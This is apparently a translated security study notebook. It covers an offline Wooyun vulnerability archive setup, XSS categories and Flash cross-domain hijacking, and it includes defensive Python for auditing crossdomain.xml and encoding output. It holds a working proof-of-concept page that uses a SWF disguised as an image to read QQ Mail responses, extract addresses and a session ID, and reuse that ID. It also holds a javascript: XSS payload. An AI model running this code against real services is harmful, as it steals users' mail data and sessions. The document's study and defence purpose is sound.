[TOC]

0x00 Preface

As the saying goes, to do good work one must first sharpen one's tools. The following are the essentials for learning network security:

  • (1) Building a local offline mirror of Wooyun: PHP 5.6 (the mysql extension must be installed; XAMPP is enough, but mind the PHP and database versions)

    ```text
    # Wooyun vulnerability library
    https://pan.baidu.com/s/1oJr2eWtcgYSe1tp5o26tBw   extraction code: g3l7
    # Wooyun knowledge base (Drops)
    https://github.com/SuperKieran/WooyunDrops


    # Storage layout:
    phpstudy
    ├─WWW
    ├─Bugs.zip (unpacks to the Bugs folder)
    ├─conn.php (edit the database user name and password inside)
    ├─upload (create it yourself)
    ├─10-14.zip (drag here and unpack)
    ├─15-a.zip (drag here and unpack)
    ├─15-b.zip (drag here and unpack)
    ├─16.zip (drag here and unpack)
    ├─static (Wooyun knowledge base)
    ├─MySQL
    ├─data
    ├─wooyun (create it yourself)
    ├─wooyun.zip (drag here and unpack)
    ```


Troubleshooting:

(1) Enable PHP short tags in php.ini, or rewrite every `<? ?>` as `<?php ?>`:

```ini
short_open_tag = On
```

(2) Images not displaying: either map the static host in the hosts file, or rewrite the stored URLs in the database:

```text
192.168.150.130 static.loner.fm
```

```sql
UPDATE wooyun.bugs SET article_title = replace(article_title, 'static.loner.fm', '192.168.150.130') ;
```

(3) Track whether a Wooyun vulnerability report has already been read:

```sql
-- wybug_id is a bounded varchar rather than longtext: MySQL refuses to build
-- the INDEX / UNIQUE key below on a TEXT column without a prefix length
CREATE TABLE record (
  id int(11) NOT NULL PRIMARY KEY AUTO_INCREMENT,
  wybug_id varchar(64) NOT NULL,
  rtime datetime,
  INDEX mul_index (wybug_id)
);
ALTER TABLE `record` ADD UNIQUE (`wybug_id`);
```

(4) Track whether a Wooyun knowledge-base article has already been read:

```sql
-- same change as above: page_id must be indexable
CREATE TABLE recordbook (
  id int(11) NOT NULL PRIMARY KEY AUTO_INCREMENT,
  page_id varchar(64) NOT NULL,
  rtime datetime,
  INDEX mul_index (page_id)
);
ALTER TABLE `recordbook` ADD UNIQUE (`page_id`);
```


0x01 Security learning

0. Vulnerability disclosure sites


1. Security self-media sites


2. Security research team sites


3. Personal blogs from the security community
5. Online ID collection

C1h2e1-QQ1119544572-Twitter@C1h2e11
蝉鸣月下独悲凉-1921409907-Team@W3bsafe
Vulkey_Chen
0ang3el
byt3bl33d3r


0x02 Security tools

1. GitHub projects

Proxy / firewall circumvention
https://github.com/shadowsocks/

Cyberspace fingerprint scanners

Web security fuzzing tools

Fuzzing dictionaries


0x03 Vulnerability classification

1. Front-end vulnerabilities

XSS - Cross-Site Scripting

Description: a web application vulnerability in which untrusted data from the user is processed by the application without validation and reflected back to the browser without correct escaping or encoding, so that the browser engine executes code that was never intended.

  • 1. XSS:

    • Stored XSS (persistent)
    • Reflected XSS (non-persistent)
    • DOM-based XSS
  • 2. Flash:

Flash cross-domain data hijacking

A Flash file disguised as an image is uploaded to victim.com and then embedded on attacker.com. Because of the same-origin policy it can only execute JavaScript in the attacker.com context, but if the SWF itself issues requests it can read files on victim.com, provided that victim.com's crossdomain.xml lists the domain from which the uploaded SWF is served among the allowed domains:

```html
<object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt">
</object>
```
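The precondition in the paragraph above is entirely a property of the victim's crossdomain.xml. As an added defensive check (example code written for this page, not from the original post or any project), the following Python routine parses a policy file and flags the grants that make the uploaded-SWF trick possible: a `*` grant, wildcard subdomain grants, `secure="false"`, and any grant that covers a host serving user uploads. The sample policy and the host name `static.victim.com` are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample: a permissive Adobe cross-domain policy (not from the page)
SAMPLE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
  <allow-access-from domain="*.victim.com" secure="false" />
  <allow-access-from domain="static.victim.com" />
  <allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
"""

# Constructed sample: a tight policy that trusts only the main site
STRICT_POLICY = """<cross-domain-policy>
  <allow-access-from domain="www.victim.com" />
</cross-domain-policy>
"""


def _matches(pattern, host):
    """Does a crossdomain.xml domain pattern cover the given host name?"""
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host == pattern[2:] or host.endswith(pattern[1:])
    return pattern == host


def audit_crossdomain(policy_xml, upload_hosts=()):
    """Return (severity, message) findings for a crossdomain.xml document.

    upload_hosts: hostnames that serve user-uploaded files. If the policy grants
    any of them access, a SWF uploaded there can read the site's responses.
    """
    findings = []
    root = ET.fromstring(policy_xml)
    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append(("critical", "allow-access-from domain='*' lets any site read responses"))
        elif domain.startswith("*."):
            findings.append(("high", f"wildcard subdomain grant {domain}: every subdomain, "
                                     f"including upload hosts, is trusted"))
        # secure defaults to true: only HTTPS-served SWFs may read HTTPS content
        if el.get("secure", "true").lower() == "false":
            findings.append(("medium", f"secure='false' on {domain}: HTTP-served SWFs may read HTTPS content"))
        for host in upload_hosts:
            if _matches(domain, host):
                findings.append(("high", f"upload host {host} is trusted via {domain}; "
                                         f"an uploaded SWF there can read site data"))
    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append(("medium", "allow-http-request-headers-from domain='*' lets any origin send custom headers"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_crossdomain(SAMPLE_POLICY, upload_hosts=("static.victim.com",)):
        print(f"[{severity}] {message}")
    print("strict policy findings:", audit_crossdomain(STRICT_POLICY, upload_hosts=("static.victim.com",)))
```

The mitigation the audit points at is the usual one: keep crossdomain.xml to an explicit list of first-party hosts, never include the host that serves user uploads, and serve uploads from a separate domain so that an uploaded SWF has no access to the main site regardless of the policy.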

A fuller PoC page of the same technique, reading the response of the request set via flashvars:

```html
<html>
<head>
  <title>just for fun</title>
  <script>
    var test = 1;
    var sid;
    var uid;
    var resultCon = '';
    function sendToJavaScript(strData) {
      var result;
      var regexp = new RegExp(/([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+/g);
      if ((result = regexp.exec(strData)) != null) {
        resultCon = resultCon + 'users: ' + result[0] + '<br />';
        while ((result = regexp.exec(strData)) != null) {
          resultCon = resultCon + 'users: ' + result[0] + '<br />';
        }
        document.write(resultCon);
      }
      // extract the SID
      var r1 = strData.match(/subtemplate=ill&sid=(.*?)&/);
      if (r1 != null) {
        sid = r1[1];
        resultCon = resultCon + 'sid: ' + sid + '<br />';
        if (test == 1) {
          var theDiv = document.getElementById("havefun");
          var content = document.createTextNode("");
          theDiv.appendChild(content);
          theDiv.innerHTML += '<object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash" data="http://join.qq.com/upload/photo/150914/439a57750ce65071b5cdbdaf0ce3bb7e.jpg"><param name="AllowScriptAccess" value="always"><param name="flashvars" value="input=http://set1.mail.qq.com/cgi-bin/laddr_lastlist?sid=' + sid + '%26t=addr_datanew%26category=hot"></object>';
        }
        test++;
      }
    }
  </script>
</head>

<body>
  just for fun
  <div id=havefun></div>
  <object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash"
    data="http://join.qq.com/upload/photo/150914/439a57750ce65071b5cdbdaf0ce3bb7e.jpg">
    <param name="AllowScriptAccess" value="always">
    <param name="flashvars"
      value="input=http://mail.qq.com/cgi-bin/mail_spam?action=check_link%26url=http://www.baidu.com">
  </object>
</body>

</html>

<script type="text/javascript">
  // immediately-invoked anonymous function (the hosting platform's "unverified provider" banner, captured together with the page source)
  !function () {
    var closed = false, bdiv;
    var charset = document.charset || document.characterSet;
    var utf8 = ['该页面的提供者尚未完成', '实名认证', '您的访问可能存在风险'];
    var gbk = ['??ҳ????ṩ????δ???', 'ʵ????֤', '???ķ??ʿ??ܴ??ڷ???'];
    var en = ['The provider of this page is not', 'verified', 'there are risks when you visiting'];

    function banner() {
      var char = charset.toLowerCase(),
        lang = '';
      switch (true) {
        case char.indexOf('utf') == 0:
          lang = utf8;
          break;
        case char.indexOf('gb') == 0:
          lang = gbk;
          break;
        default:
          lang = en;
      }
      var _div =
        '<div style="position:fixed;_position:absolute;top:0;left:0;right:0;padding:12px;background-color:rgba(0,0,0,0.5);filter: progid:DXImageTransform.Microsoft.gradient(startcolorstr=#7F000000,endcolorstr=#7F000000);color:#fff;text-align:center;font-size:16px;font-family:simsun,serif;cursor:default;z-index:2147483647;"><p style="margin:0;padding:0;">' +
        lang[0] +
        ' <a style="text-decoration:none;color:#37afe4;" target="_blank" href="http://sae.sina.com.cn/?m=faq&a=view&doc_id=22">' +
        lang[1] + '</a> ' + lang[2] +
        '</p><a style="position:absolute;right:12px;top:50%;font-size:20px;color:#fff;border:none;margin:0;padding:0;;margin-top:-10px;line-height:20px;background:none;cursor:pointer;font-family:Helvetica Neue, Helvetica, Arial, sans-serif;outline:none;">x</a></div>',
        div = document.createElement('div');
      div.innerHTML = _div;
      var close = div.getElementsByTagName('a')[1],
        x = 0,
        y = 0;
      close.onmouseover = function (event) {
        var e = event ? event : window.event;
        x = e.clientX;
        y = e.clientY;
      };
      close.onclick = function (event) {
        if (event && !event.initMouseEvent) {
          return
        }
        var e = event ? event : window.event;
        if (Math.abs(e.clientX - x) < 10 && Math.abs(e.clientY - y) < 10) {
          div.style.display = 'none';
          closed = true;
        }
      };
      return div
    }

    function t() {
      if (closed) {
        clearInterval(tt);
        return
      }
      if (bdiv && bdiv.parentNode) {
        bdiv.parentNode.removeChild(bdiv)
      }
      bdiv = banner();
      document.body.appendChild(bdiv);
    }
    t();
    var tt = setInterval(t, 5000);
  }();
</script>
```

POC:

```xml
<content>
<tag img="http://travel.weiyigeek.top/1/72_1.jpg" txt="" url="javascript:alert(1);"/>
</content>
```
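The PoC above works because the `url` attribute is dropped into a link without any scheme check, and the XSS description at the top of this section comes down to the same missing step: output encoding of untrusted data. As an added example (written for this page, not code from the original post or any project), the following Python routine renders the PoC's `<tag img= txt= url=>` element in its vulnerable form and in a hardened form that HTML-encodes every attribute and allows only `http`/`https` or relative URLs. The function names `render_tag`/`safe_href` and the sample inputs are constructed for illustration.

```python
import html
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}


def safe_href(url):
    """Allow only http(s) and relative URLs; anything else (javascript:, data:,
    vbscript:) is replaced by a harmless '#'. Control characters are stripped
    first because browsers ignore them when parsing the scheme, so a value
    like 'java\\tscript:' would otherwise slip past a naive prefix check."""
    cleaned = "".join(ch for ch in url.strip() if ord(ch) > 31)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme == "":
        return cleaned            # relative URL, stays on the current origin
    return cleaned if scheme in SAFE_SCHEMES else "#"


def render_tag(img, txt, url, escape=True):
    """Render a <tag img= txt= url=> element (the PoC's format) as an HTML link.

    escape=False reproduces the vulnerable behaviour: attribute values are
    reflected verbatim, so a javascript: URL or a quote-breaking txt lands in
    the page unchanged. escape=True encodes every value for the attribute
    context and filters the URL scheme."""
    if not escape:
        return f'<a href="{url}"><img src="{img}" alt="{txt}"></a>'
    return (
        f'<a href="{html.escape(safe_href(url))}">'
        f'<img src="{html.escape(safe_href(img))}" alt="{html.escape(txt)}"></a>'
    )


# Constructed untrusted inputs mirroring the PoC above (not from the page)
POC_IMG = "http://example.test/1.jpg"
POC_TXT = '"><script>alert(1)</script>'
POC_URL = "javascript:alert(1);"

if __name__ == "__main__":
    print("vulnerable:", render_tag(POC_IMG, POC_TXT, POC_URL, escape=False))
    print("hardened:  ", render_tag(POC_IMG, POC_TXT, POC_URL))
```

Encoding alone is not enough for the `url` attribute: `html.escape` leaves `javascript:alert(1);` intact because it contains no HTML metacharacters, which is why the scheme allowlist is a separate step. The same split applies to any other context (JavaScript strings, CSS, URL query parameters): each needs its own encoder, and a single HTML escape does not cover them.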

CSRF
Redirect